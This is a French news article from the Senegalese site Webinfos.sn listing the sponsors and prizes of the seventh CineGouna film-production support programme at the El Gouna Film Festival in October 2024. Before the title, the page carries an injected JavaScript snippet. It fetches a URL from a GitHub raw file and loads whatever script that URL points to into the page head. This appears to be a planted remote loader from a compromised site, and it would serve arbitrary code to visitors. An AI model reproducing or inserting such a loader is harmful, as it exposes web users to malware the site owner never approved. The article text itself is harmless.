;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); CINE GOUNA TO SUPPORT FILM PRODUCTION DÉVOILE LES SPONSORS ET RÉCOMPENSES DE SA 7ÈME SESSION. – Webinfos.sn
Le plaisir de s'informer juste et vrai, en temps réel !

CLIQUEZ SUR L'IMAGE POUR NOUS SOUTENIR

CINE GOUNA TO SUPPORT FILM PRODUCTION DÉVOILE LES SPONSORS ET RÉCOMPENSES DE SA 7ÈME SESSION.

0 107

Le Festival du Film d’El Gouna annonce la liste des sponsors et des prix de la 7ème édition de «CineGouna to Support Film Production», le programme du festival dédié au développement de projets et au soutien à la coproduction de films arabes, qui se tiendra dans le cadre de la 7ème session du festival, entre le 25 et le 31 octobre 2024.

La valeur totale estimée des Prix Cine Gouna pour le soutien à la production cinématographique dépasse cette année 360 ​​000 dollars, dont 180 000 dollars en espèces, en compétition pour 21 projets arabes en phase de développement et de post-production. Il s’agit d’un total record de prix décernés au film El Gouna. Le festival continue pour soutenir le cinéma et les cinéastes arabes.

Le projet gagnant en phase de développement et le film gagnant en phase de post-production, recevront un certificat de la plateforme Cine Gouna et un prix financier de 15 000 $ US pour chacun d’eux.

Alors qu’un groupe composé des plus importantes sociétés de production et de services, d’autorités et d’institutions cinématographiques, décerne de multiples prix pour lesquels les projets concourent, dont 9 invitations différentes, qui permettent aux cinéastes de participer aux plus importants laboratoires de développement, marchés et festivals internationaux, garantissant qu’ils développent leur travaille, tout en élargissant leur réseau de communication avec la communauté cinématographique internationale.

Les projets sélectionnés bénéficieront d’un précieux programme de formation pour développer leurs capacités de pitch, supervisé par l’expert américain du cinéma Paul Foley, scénariste et professeur à la School of Cinematic Arts de l’Université de Caroline du Sud (USC). Le programme de formation est dispensé par International Filmed Entertainment.

Les prix financiers de la 7ème session de «Cine Gouna pour soutenir la production cinématographique», sont présentés par : R et Tana, Arab Radio and Television ART, New Century Productions, Lagoonie Film Productions, Red Star Films, MBC Studios, la Fondation internationale pour les talents émergents. IEFTA, Rise Studios et Blue B Productions, ESLSCA University, O West, The Sound of Egypt, Red Sea Film Fund, Her Story Films et Sard .

Tandis que des prix de service en distribution, post-production et invitations artistiques sont décernés par : l’ambassade américaine au Caire, Film Independent, l’ambassade de France au Caire, l’Institut français, MAD Solution, l’Arab Cinema Center, la Royal Film Commission de Jordanie. , Sard, le Torino Film Laboratory et la Fondation européenne du film documentaire (DEA), B Media Productions, Big Bang Studios, Shift Studios et Mediterranean Documentary Market (Medimed).

Commentant ces récompenses, Amr Mansi , Co-fondateur et Directeur exécutif du Festival d’El Gouna , a déclaré :《Le nombre croissant de sponsors et la valeur des récompenses décernées chaque année reflètent l’appréciation de nos partenaires dans les différents secteurs cinématographiques et artistiques. pour le rôle joué par le Festival d’El Gouna et Cine Gouna dans le soutien à la production cinématographique》
Et la capacité de l’équipe du festival à sélectionner les meilleurs projets arabes qui méritent d’être soutenus.

À son tour, Marianne Khoury, la Directrice Artistique du festival , a déclaré qu’elle remercie tout particulièrement tous les sponsors qui ont contribué à soutenir cette initiative. Elle a déclaré:《Votre soutien continu reflète votre engagement envers la culture et les arts, et contribue à renforcer le statut du Festival d’El Gouna en tant que phare de la créativité》, ajoutant : « Notre objectif principal est toujours de fournir les meilleures ressources possibles aux cinéastes arabes. C’est ce que nous cherchons à réaliser à travers Cine Gouna pour soutenir les films, et nous avons déjà réussi à « attirer des sponsors et des financiers du monde entier》.

Pour sa part, Ahmed Shawky, Président de « Cine Gouna Film Production Support », a commenté la liste en disant:《 Nous remercions tous nos soutiens de la septième édition, qu’il s’agisse des partenaires du succès continu des éditions précédentes, ou des nouveaux sponsors qui ont décidé de rejoindre notre aventure ludique visant à mettre en valeur et à soutenir les meilleurs projets cinématographiques du monde》.

Voici la liste complète des récompenses de la septième session de «Ciné Gouna pour soutenir la production cinématographique», notant que la liste a été mise à jour pour la dernière fois aujourd’hui, le 2 octobre 2024, et que d’autres récompenses pourraient être ajoutées avant le début du festival :

Certificat de la plateforme Cine Gouna et une récompense financière de 15 000 dollars américains pour le meilleur projet en phase de développement.

Certificat de la plateforme Cine Gouna et une récompense financière de 15 000 dollars américains pour le meilleur film en phase de post-production.

Prix ​​financier de 20 000 dollars américains de Rotana .

Récompense financière de 10 000 dollars américains de la part de la radio et télévision arabe ART.

Prix ​​​​de 10 000 $ de New Century Productions.

Prix ​​en espèces de 10 000 $ de Lagoonie Film Production.

Prix ​​en espèces de 10 000 $ de Red Star Films.

Prix ​​en espèces de 10 000 $ de MBC Studios .

10 000 dollars américains en récompense financière de la Fondation internationale pour les talents émergents (IEFTA).

Prix ​​​​de 10 000 $ US de Rise Studios.

Prix ​​en espèces de 10 000 $ de Blue Bee Productions.

Prix ​​en espèces de 10 000 $ pour un film égyptien de l’Université ESLSCA.

Prix ​​en espèces de 10 000 $ offert par O West .

Prix ​​en espèces de 10 000 $ de The Sound of Egypt.

Bourse financière de 5 000 $ du Red Sea Film Fund pour un projet en phase de développement.

Prix ​​​​en espèces de 5 000 $ du Red Sea Film Fund pour un film en post-production.

Prix ​​en espèces de 5 000 $ de Hair Story Films.

Prix ​​en espèces de 5 000 $ de SRD.

5 000 dollars américains pour les services de développement de scénarios avec Maryam Naoum de Sard .

Une résidence de création pour un cinéaste à Los Angeles d’une valeur de 13 000 $ de l’ambassade américaine au Caire et de Film Independent.

Deux invitations à un festival du cinéma français de la part de l’Ambassade de France au Caire et de l’Institut français.

Valeur de distribution de film de 50 000 USD de MAD Solution .

Une invitation à assister au Rotterdam Film Lab d’une valeur de 5 000 $ de la part de l’Arab Cinema Center .

Une invitation adressée à un projet en développement pour participer au Rawi Lab de la Royal Film Commission de Jordanie.

Une invitation adressée à un film en phase de post-production à participer au Mosaic Lab de la Royal Film Commission de Jordanie.

Une invitation couverte pour un projet en phase de développement à participer au Laboratoire du Film de Turin (TFL NEXT) , avec les frais de participation de 1 700 euros pris en charge par le Laboratoire du Film de Turin et l’IEFTA .

Une invitation au marché européen de la Berlinale couvrant l’accréditation, les frais de voyage de 1 500 € et un abonnement d’un an aux services DAE fournis par la Fondation européenne du film documentaire (DEA) et l’IEFTA.

23 000 $ pour les services de post-production à répartir entre deux projets de B Media Productions.

20 000 $ US pour les services de post-production seront répartis entre deux projets de Big Bang Studios .

10 000 USD pour les services DCP complets de Shift Studios.

10 000 dollars américains est la valeur des services du package de promotion complète de Shift Studios .

Une invitation à un projet de film documentaire en développement pour participer au Marché Méditerranéen du Film Documentaire (Medimed).

Malick Bah

Laisser un commentaire

Votre adresse email ne sera pas publiée.